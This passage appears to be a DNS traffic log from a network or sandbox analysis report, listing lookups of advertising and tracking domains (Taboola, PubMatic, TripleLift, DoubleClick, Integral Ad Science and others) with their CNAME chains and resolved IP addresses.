                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.241.123.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.208.164.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.30.59.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039537907 CEST1.1.1.1192.168.2.40xf188No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039674044 CEST1.1.1.1192.168.2.40x6406No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039674044 CEST1.1.1.1192.168.2.40x6406No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039674044 CEST1.1.1.1192.168.2.40x6406No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039674044 CEST1.1.1.1192.168.2.40x6406No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.039674044 CEST1.1.1.1192.168.2.40x6406No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.044682026 CEST1.1.1.1192.168.2.40xf617No error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.044682026 CEST1.1.1.1192.168.2.40xf617No error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.044682026 CEST1.1.1.1192.168.2.40xf617No error (0)hbopenbid-ams.pubmnet.com185.64.189.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.044712067 CEST1.1.1.1192.168.2.40x79feNo error (0)hbopenbid.pubmatic.comhbprebid-v3.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.044712067 CEST1.1.1.1192.168.2.40x79feNo error (0)hbprebid-v3.pubmnet.comhbopenbid-ams.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.054932117 CEST1.1.1.1192.168.2.40xd53fNo error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.056093931 CEST1.1.1.1192.168.2.40x5410No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.056093931 CEST1.1.1.1192.168.2.40x5410No error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.056093931 CEST1.1.1.1192.168.2.40x5410No error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.056093931 CEST1.1.1.1192.168.2.40x5410No error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.853527069 CEST1.1.1.1192.168.2.40xd403No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.853527069 CEST1.1.1.1192.168.2.40xd403No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.855026007 CEST1.1.1.1192.168.2.40x75b0No error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970360041 CEST1.1.1.1192.168.2.40xd7c1No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970360041 CEST1.1.1.1192.168.2.40xd7c1No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.241.123.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.208.164.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.254.88.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.30.59.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.253.58.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.970777035 CEST1.1.1.1192.168.2.40xb96eNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.194.157.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.973979950 CEST1.1.1.1192.168.2.40x9aafNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.973979950 CEST1.1.1.1192.168.2.40x9aafNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.973979950 CEST1.1.1.1192.168.2.40x9aafNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.973979950 CEST1.1.1.1192.168.2.40x9aafNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.973979950 CEST1.1.1.1192.168.2.40x9aafNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.974741936 CEST1.1.1.1192.168.2.40x199eNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.093209028 CEST1.1.1.1192.168.2.40xd6c0No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.093209028 CEST1.1.1.1192.168.2.40xd6c0No error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.093209028 CEST1.1.1.1192.168.2.40xd6c0No error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.093209028 CEST1.1.1.1192.168.2.40xd6c0No error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.093226910 CEST1.1.1.1192.168.2.40xb9bdNo error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.363068104 CEST1.1.1.1192.168.2.40x5809No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.363068104 CEST1.1.1.1192.168.2.40x5809No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.363068104 CEST1.1.1.1192.168.2.40x5809No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.368383884 CEST1.1.1.1192.168.2.40xbbedNo error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.422827005 CEST1.1.1.1192.168.2.40x5ffcNo error (0)ssc-cms.33across.compixel.33across.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.423027039 CEST1.1.1.1192.168.2.40x4ba1No error (0)ssc-cms.33across.compixel.33across.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.423027039 CEST1.1.1.1192.168.2.40x4ba1No error (0)pixel.33across.com67.202.105.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:29.423027039 CEST1.1.1.1192.168.2.40x4ba1No error (0)pixel.33across.com67.202.105.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.076598883 CEST1.1.1.1192.168.2.40x25dcNo error (0)contextual.media.net95.101.148.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.099486113 CEST1.1.1.1192.168.2.40x12d6No error (0)de.tynt.com67.202.105.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.099486113 CEST1.1.1.1192.168.2.40x12d6No error (0)de.tynt.com67.202.105.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.752912045 CEST1.1.1.1192.168.2.40xcbfcNo error (0)hde.tynt.com67.202.105.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:30.752912045 CEST1.1.1.1192.168.2.40xcbfcNo error (0)hde.tynt.com67.202.105.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099098921 CEST1.1.1.1192.168.2.40xf2deNo error (0)fw.adsafeprotected.comiefw.adsafeprotected.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099098921 CEST1.1.1.1192.168.2.40xf2deNo error (0)iefw.adsafeprotected.comfirewall-external-2134955858.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)fw.adsafeprotected.comiefw.adsafeprotected.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)iefw.adsafeprotected.comfirewall-external-2134955858.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com34.250.232.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.154.112.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.77.17.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com52.19.215.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.229.0.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com52.31.206.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com52.214.60.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:31.099189043 CEST1.1.1.1192.168.2.40x282dNo error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.72.221.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.703686953 CEST1.1.1.1192.168.2.40xfd24No error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.704574108 CEST1.1.1.1192.168.2.40xc5dcNo error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.706631899 CEST1.1.1.1192.168.2.40xb6ebNo error (0)cm.g.doubleclick.net142.250.186.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.709937096 CEST1.1.1.1192.168.2.40xb1c6No error (0)sync.teads.tvsync.teads.tv.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:32.714368105 CEST1.1.1.1192.168.2.40x94fcNo error (0)sync.teads.tvsync.teads.tv.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com23.22.128.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com35.168.44.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com34.193.137.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com44.197.63.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com35.153.95.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com52.203.180.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.227.156.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774698019 CEST1.1.1.1192.168.2.40xab69No error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.217.145.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774771929 CEST1.1.1.1192.168.2.40x6a63No error (0)static.adsafeprotected.comd162h6x3rxav67.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774771929 CEST1.1.1.1192.168.2.40x6a63No error (0)d162h6x3rxav67.cloudfront.net52.84.90.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774771929 CEST1.1.1.1192.168.2.40x6a63No error (0)d162h6x3rxav67.cloudfront.net52.84.90.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774771929 CEST1.1.1.1192.168.2.40x6a63No error (0)d162h6x3rxav67.cloudfront.net52.84.90.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.774771929 CEST1.1.1.1192.168.2.40x6a63No error (0)d162h6x3rxav67.cloudfront.net52.84.90.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.775675058 CEST1.1.1.1192.168.2.40xd387No error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.775688887 CEST1.1.1.1192.168.2.40x7c6bNo error (0)static.adsafeprotected.comd162h6x3rxav67.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.777012110 CEST1.1.1.1192.168.2.40xbffbNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778209925 CEST1.1.1.1192.168.2.40x226fNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.228.58.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com34.197.145.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com52.70.72.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com35.168.35.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.230.64.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com34.196.160.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com23.22.128.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778832912 CEST1.1.1.1192.168.2.40x2bcbNo error (0)dt-external-217593033.us-east-1.elb.amazonaws.com3.94.199.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778847933 CEST1.1.1.1192.168.2.40x2057No error (0)dt.adsafeprotected.comdt-external-217593033.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.778861046 CEST1.1.1.1192.168.2.40x3423No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.779850960 CEST1.1.1.1192.168.2.40xe862No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.779864073 CEST1.1.1.1192.168.2.40x35e9No error (0)static.adsafeprotected.comd162h6x3rxav67.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.780630112 CEST1.1.1.1192.168.2.40x3055No error (0)static.adsafeprotected.comd162h6x3rxav67.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.780630112 CEST1.1.1.1192.168.2.40x3055No error (0)d162h6x3rxav67.cloudfront.net108.139.243.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.780630112 CEST1.1.1.1192.168.2.40x3055No error (0)d162h6x3rxav67.cloudfront.net108.139.243.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.780630112 CEST1.1.1.1192.168.2.40x3055No error (0)d162h6x3rxav67.cloudfront.net108.139.243.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.780630112 CEST1.1.1.1192.168.2.40x3055No error (0)d162h6x3rxav67.cloudfront.net108.139.243.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.196.10.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.197.91.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.146.2.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.163.230.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com52.7.204.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.167.160.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.162.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:34.987946987 CEST1.1.1.1192.168.2.40x2f6eNo error (0)sync.srv.stackadapt.com54.174.240.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)fw.adsafeprotected.comiefw.adsafeprotected.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)iefw.adsafeprotected.comfirewall-external-2134955858.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.171.90.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com52.212.218.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:35.012073994 CEST1.1.1.1192.168.2.40x2bd7No error (0)firewall-external-2134955858.eu-west-1.elb.amazonaws.com54.229.194.125A (IP address)IN (0x0001)false
